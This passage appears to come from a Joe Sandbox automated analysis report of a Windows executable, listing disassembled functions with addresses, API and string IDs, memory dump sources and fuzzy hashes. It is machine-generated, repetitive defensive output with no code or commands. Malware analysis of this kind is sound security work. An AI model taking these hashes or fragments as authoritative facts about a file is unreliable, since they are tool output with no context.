                                                                                                                                                                                                                    • Instruction Fuzzy Hash: C7518836B14B418AEB14CF62E818A6D33A0FB88B98B584B31DE1E93B54DF3ED445C700
                                                                                                                                                                                                                    Function 00007FF656D30D70 Relevance: 21.4, APIs: 10, Strings: 2, Instructions: 388COMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000013.00000002.2360142073.00007FF656CB1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF656CB0000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2359926804.00007FF656CB0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360318494.00007FF656D65000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360318494.00007FF656D88000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360380444.00007FF656D9A000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360426817.00007FF656DA4000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_7ff656cb0000_PefjSkkhb.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: Variant$ClearInit
                                                                                                                                                                                                                    • String ID: %4d%02d%02d%02d%02d%02d$Default
                                                                                                                                                                                                                    • API String ID: 2610073882-3931177956
                                                                                                                                                                                                                    • Opcode ID: d03b08c060896c5e0d549012fd2abdb4b620a53ef1902261a31613745fa192b9
                                                                                                                                                                                                                    • Instruction ID: a17467324b29d9c66a4b109a1188724d21d1ae777854ebdde3da0ab9140828a1
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: d03b08c060896c5e0d549012fd2abdb4b620a53ef1902261a31613745fa192b9
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 73026B72B0864385EB68AB65C5941BD73B1EF45B80F0D8B35CB0EA7A95CF2EE854C340
                                                                                                                                                                                                                    Function 00007FF656D3246C Relevance: 21.3, APIs: 11, Strings: 1, Instructions: 281fileCOMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000013.00000002.2360142073.00007FF656CB1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF656CB0000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2359926804.00007FF656CB0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360318494.00007FF656D65000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360318494.00007FF656D88000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360380444.00007FF656D9A000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360426817.00007FF656DA4000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_7ff656cb0000_PefjSkkhb.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: Filewcscat$DeleteTemp$NamePath_fread_nolock_invalid_parameter_noinfowcscpy
                                                                                                                                                                                                                    • String ID: aut
                                                                                                                                                                                                                    • API String ID: 130057722-3010740371
                                                                                                                                                                                                                    • Opcode ID: 20b73ab5acabc0c95c6a864299cc2b07bf77463cf6a6987be4e7046863da8f3a
                                                                                                                                                                                                                    • Instruction ID: dc73bcd1fde12d7e4cc61fa815a426d201b59783d6e0e3b342e3dbc93242e852
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 20b73ab5acabc0c95c6a864299cc2b07bf77463cf6a6987be4e7046863da8f3a
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 0BC1A272B18AC685EB30DF25E8406E97360FB84788F444636EA8DABB59DF7DD245C700
                                                                                                                                                                                                                    Function 00007FF656D5E40C Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 177windowCOMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000013.00000002.2360142073.00007FF656CB1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF656CB0000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2359926804.00007FF656CB0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360318494.00007FF656D65000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360318494.00007FF656D88000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360380444.00007FF656D9A000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360426817.00007FF656DA4000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_7ff656cb0000_PefjSkkhb.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: Window$MessageSend$CreateDestroy$DesktopRect
                                                                                                                                                                                                                    • String ID: tooltips_class32
                                                                                                                                                                                                                    • API String ID: 2443926738-1918224756
                                                                                                                                                                                                                    • Opcode ID: aaeb60d555cc86bf3e66e764e60d0e4162c92bacd9f6913f3df39f71d352b9df
                                                                                                                                                                                                                    • Instruction ID: 3eedd04f5646d60b8ae11fcffc28543ec5b16996b35aa927b4c7db764c18f96a
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: aaeb60d555cc86bf3e66e764e60d0e4162c92bacd9f6913f3df39f71d352b9df
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 03917B32A18B8585EB50CF65E4547AD33A1EB88BC4F484636DE4DA7B68DF3ED045C700
                                                                                                                                                                                                                    Function 00007FF656D38BF4 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 162timeCOMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000013.00000002.2360142073.00007FF656CB1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF656CB0000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2359926804.00007FF656CB0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360318494.00007FF656D65000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360318494.00007FF656D88000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360380444.00007FF656D9A000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360426817.00007FF656DA4000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_7ff656cb0000_PefjSkkhb.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: CurrentDirectoryTime$File$Localwcscat$Systemwcscpy
                                                                                                                                                                                                                    • String ID: *.*
                                                                                                                                                                                                                    • API String ID: 1111067124-438819550
                                                                                                                                                                                                                    • Opcode ID: 98a71cfb6502df9087812816f04c928264b270ce88f96a393908c63e275b4126
                                                                                                                                                                                                                    • Instruction ID: fbe054eccf30248aad7cce0edc29278c81d35e1017b44e6c0b5df9dad88ac1a1
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 98a71cfb6502df9087812816f04c928264b270ce88f96a393908c63e275b4126
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 7571B072608B8691DB50DF12D8401EE7370FB84B88F881631DA4E97B66DF7EE549C740
                                                                                                                                                                                                                    Function 00007FF656D44F54 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 151windowCOMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000013.00000002.2360142073.00007FF656CB1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF656CB0000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2359926804.00007FF656CB0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360318494.00007FF656D65000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360318494.00007FF656D88000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360380444.00007FF656D9A000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360426817.00007FF656DA4000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_7ff656cb0000_PefjSkkhb.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: Object$BitsCompatibleCreateDeleteSelect$BitmapReleaseStretch
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 2598888154-3916222277
                                                                                                                                                                                                                    • Opcode ID: cc73b5765ce571ff424191e1c315cf4eedd4f9a49c7432d87affb49461dd79c7
                                                                                                                                                                                                                    • Instruction ID: 6f0fc5ee93a0d42a98e4f00a56910c47f467f3eecc500cec5c75f70c08f09df1
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: cc73b5765ce571ff424191e1c315cf4eedd4f9a49c7432d87affb49461dd79c7
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 00517676B15641CBE750CF65E440AAE77B1F748B88F048635EE4AA3B18CF79E455CB00
                                                                                                                                                                                                                    Function 00007FF656D1B0C4 Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 117memoryCOMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000013.00000002.2360142073.00007FF656CB1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF656CB0000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2359926804.00007FF656CB0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360318494.00007FF656D65000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360318494.00007FF656D88000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360380444.00007FF656D9A000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360426817.00007FF656DA4000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_7ff656cb0000_PefjSkkhb.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
                                                                                                                                                                                                                    • String ID: NULL Pointer assignment
                                                                                                                                                                                                                    • API String ID: 2706829360-2785691316
                                                                                                                                                                                                                    • Opcode ID: f387a50e6818b73d110b12cd73088d785cdd73093c11eac48bc39c6d5f3c3ae3
                                                                                                                                                                                                                    • Instruction ID: 32bb32cc98885114abed537620bcd9182a10ac96a0a075cee918b4f7f619eb87
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: f387a50e6818b73d110b12cd73088d785cdd73093c11eac48bc39c6d5f3c3ae3
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: D8518332B25A528AEB10DF65D8806BC3770FB84F88F484631DE0EA7A65DF79D089C340
                                                                                                                                                                                                                    Function 00007FF656D51110 Relevance: 19.6, APIs: 1, Strings: 10, Instructions: 371COMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • CharUpperBuffW.USER32(?,?,?,00000000,?,?,?,00007FF656D4FD7B), ref: 00007FF656D51143
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000013.00000002.2360142073.00007FF656CB1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF656CB0000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2359926804.00007FF656CB0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360318494.00007FF656D65000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360318494.00007FF656D88000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360380444.00007FF656D9A000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360426817.00007FF656DA4000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_7ff656cb0000_PefjSkkhb.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: BuffCharUpper
                                                                                                                                                                                                                    • String ID: HKCC$HKCR$HKCU$HKEY_CLASSES_ROOT$HKEY_CURRENT_CONFIG$HKEY_CURRENT_USER$HKEY_LOCAL_MACHINE$HKEY_USERS$HKLM$HKU
                                                                                                                                                                                                                    • API String ID: 3964851224-909552448
                                                                                                                                                                                                                    • Opcode ID: 48ce5f8ab7038dd94976e3b00d3167ae2925137fb7b03817e14e3f39c5b841c4
                                                                                                                                                                                                                    • Instruction ID: 2e8aaa387c5c738b0c6015ecaea82b3a4d7431a96e6d692bbc198f1630d02909
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 48ce5f8ab7038dd94976e3b00d3167ae2925137fb7b03817e14e3f39c5b841c4
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: ACE18F52F0869781EA609B65DC512B922A0FB35B98F4C4B31C91EE7BD4FE3EE945C300
                                                                                                                                                                                                                    Function 00007FF656D387CC Relevance: 19.4, APIs: 10, Strings: 1, Instructions: 200COMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000013.00000002.2360142073.00007FF656CB1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF656CB0000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2359926804.00007FF656CB0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360318494.00007FF656D65000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360318494.00007FF656D88000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360380444.00007FF656D9A000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360426817.00007FF656DA4000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_7ff656cb0000_PefjSkkhb.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: CurrentDirectory$AttributesFilewcscat$wcscpy
                                                                                                                                                                                                                    • String ID: *.*
                                                                                                                                                                                                                    • API String ID: 4125642244-438819550
                                                                                                                                                                                                                    • Opcode ID: 1b6dd8a96d898a21e7a73211ee0a4e3b10aba06561d9a5e90c26a3235988e558
                                                                                                                                                                                                                    • Instruction ID: 48943c70a7f7f26d5fad875594c52bd18e6e4cd2b63657f02f26d76bf2c8f8b1
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 1b6dd8a96d898a21e7a73211ee0a4e3b10aba06561d9a5e90c26a3235988e558
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 5781A232B18A8286EB54DF15D8406BD73A0FF44B84F880A36DA4EA7795DF7EE544C740
                                                                                                                                                                                                                    Function 00007FF656D2A40C Relevance: 19.4, APIs: 10, Strings: 1, Instructions: 188windowsleepCOMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000013.00000002.2360142073.00007FF656CB1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF656CB0000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2359926804.00007FF656CB0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360318494.00007FF656D65000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360318494.00007FF656D88000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360380444.00007FF656D9A000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360426817.00007FF656DA4000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_7ff656cb0000_PefjSkkhb.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: ItemMenu$Info$CheckCountRadioSleep
                                                                                                                                                                                                                    • String ID: P
                                                                                                                                                                                                                    • API String ID: 1460738036-3110715001
                                                                                                                                                                                                                    • Opcode ID: 6e2be1337fb57673dad59794737e60112838fe0b06465b145457b8a8f464ada3
                                                                                                                                                                                                                    • Instruction ID: 09f75eaaec34500eb42c425b6964de95ac9b66c612cdab02dcd9020be63dc2e0
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 6e2be1337fb57673dad59794737e60112838fe0b06465b145457b8a8f464ada3
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: B5710922A0C68286FB60DF25D8443BE2761FB45788F5C4B31DA4EA7695CF7EE54AC700
                                                                                                                                                                                                                    Function 00007FF656D33268 Relevance: 19.4, APIs: 5, Strings: 6, Instructions: 135COMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000013.00000002.2360142073.00007FF656CB1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF656CB0000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2359926804.00007FF656CB0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360318494.00007FF656D65000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360318494.00007FF656D88000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360380444.00007FF656D9A000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360426817.00007FF656DA4000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_7ff656cb0000_PefjSkkhb.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: LoadStringwprintf
                                                                                                                                                                                                                    • String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Incorrect parameters to object property !$Line %d (File "%s"):$^ ERROR
                                                                                                                                                                                                                    • API String ID: 3297454147-3080491070
                                                                                                                                                                                                                    • Opcode ID: 921b602f5fcb54eacd7a62b3ce9e0f2e08e995aee376e847d7660b2710a32505
                                                                                                                                                                                                                    • Instruction ID: cf7a312bcdbf800040760cf5a8a7e3a7b33fe7f63686f599e404a5d9315f5e29
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 921b602f5fcb54eacd7a62b3ce9e0f2e08e995aee376e847d7660b2710a32505
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 3A61A771B1CA8292EB40DB64E8505EC6370FB44744F881632EA4DA76AACF7EE506C740
                                                                                                                                                                                                                    Function 00007FF656D274B0 Relevance: 19.4, APIs: 6, Strings: 5, Instructions: 128windowCOMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000013.00000002.2360142073.00007FF656CB1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF656CB0000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2359926804.00007FF656CB0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360318494.00007FF656D65000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360318494.00007FF656D88000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360380444.00007FF656D9A000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360426817.00007FF656DA4000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_7ff656cb0000_PefjSkkhb.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: HandleLoadModuleString$Messagewprintf
                                                                                                                                                                                                                    • String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d (File "%s"):$Line %d:$^ ERROR
                                                                                                                                                                                                                    • API String ID: 4051287042-2268648507
                                                                                                                                                                                                                    • Opcode ID: 6f60d895e456e1bcae49e483a71499a5f57f9936a6ffa7df15260821f561c8be
                                                                                                                                                                                                                    • Instruction ID: f34b46f8b448de3f5479440a75e057122781a44643fed9d4968d385c51c36f1e
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 6f60d895e456e1bcae49e483a71499a5f57f9936a6ffa7df15260821f561c8be
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: D7519071B18A4291EB50EB60E8414FD6331FF94784F881632EA4EB76AADF7ED506C740
                                                                                                                                                                                                                    Function 00007FF656D2D4AC Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 65sleepwindowtimeCOMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000013.00000002.2360142073.00007FF656CB1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF656CB0000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2359926804.00007FF656CB0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360318494.00007FF656D65000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360318494.00007FF656D88000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360380444.00007FF656D9A000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360426817.00007FF656DA4000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_7ff656cb0000_PefjSkkhb.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: Thread$Window$CurrentMessageProcessSendSleep$ActiveAttachDialogEnumFindInputTimeWindowstime
                                                                                                                                                                                                                    • String ID: BUTTON
                                                                                                                                                                                                                    • API String ID: 3935177441-3405671355
                                                                                                                                                                                                                    • Opcode ID: f78108109216f5a9e13feac809e7b4bcbb9376684aa6c7b0e89a3c685e053ef5
                                                                                                                                                                                                                    • Instruction ID: d2d35c24839ec9645cf1e070755ec5e0e9d82a556fbc4dd891da2667fb1bf0d0
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: f78108109216f5a9e13feac809e7b4bcbb9376684aa6c7b0e89a3c685e053ef5
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 62315930E0E64782FB209B25EC94B753361AF89784F4D4F31D90EE66A0CE6FA485C740
                                                                                                                                                                                                                    Function 00007FF656CB15EC Relevance: 18.2, APIs: 12, Instructions: 191timeCOMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000013.00000002.2360142073.00007FF656CB1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF656CB0000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2359926804.00007FF656CB0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360318494.00007FF656D65000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360318494.00007FF656D88000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360380444.00007FF656D9A000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360426817.00007FF656DA4000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_7ff656cb0000_PefjSkkhb.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: Destroy$AcceleratorKillTableTimerWindow
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 1974058525-0
                                                                                                                                                                                                                    • Opcode ID: 6cdb159a16386605d03a4636ec8d7d44e6b405ec507df293c2c5860328ff1f19
                                                                                                                                                                                                                    • Instruction ID: cc5f03c6d8ecadb6b87f93488cfe5de70103ce75e613edd7d9213f57f44da9dc
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 6cdb159a16386605d03a4636ec8d7d44e6b405ec507df293c2c5860328ff1f19
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 80912A72A0DA4285EF648F55E49067873B4EF84B84F9C4A31C94EEBB65DE3EE481C350
                                                                                                                                                                                                                    Function 00007FF656D22F78 Relevance: 18.2, APIs: 12, Instructions: 173COMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000013.00000002.2360142073.00007FF656CB1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF656CB0000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2359926804.00007FF656CB0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360318494.00007FF656D65000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360318494.00007FF656D88000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360380444.00007FF656D9A000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360426817.00007FF656DA4000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_7ff656cb0000_PefjSkkhb.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: Window$ItemMoveRect$Invalidate
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 3096461208-0
                                                                                                                                                                                                                    • Opcode ID: cd18a514988302620758944a1eb5a442a77522faab4df44982a6bd62bf806ab3
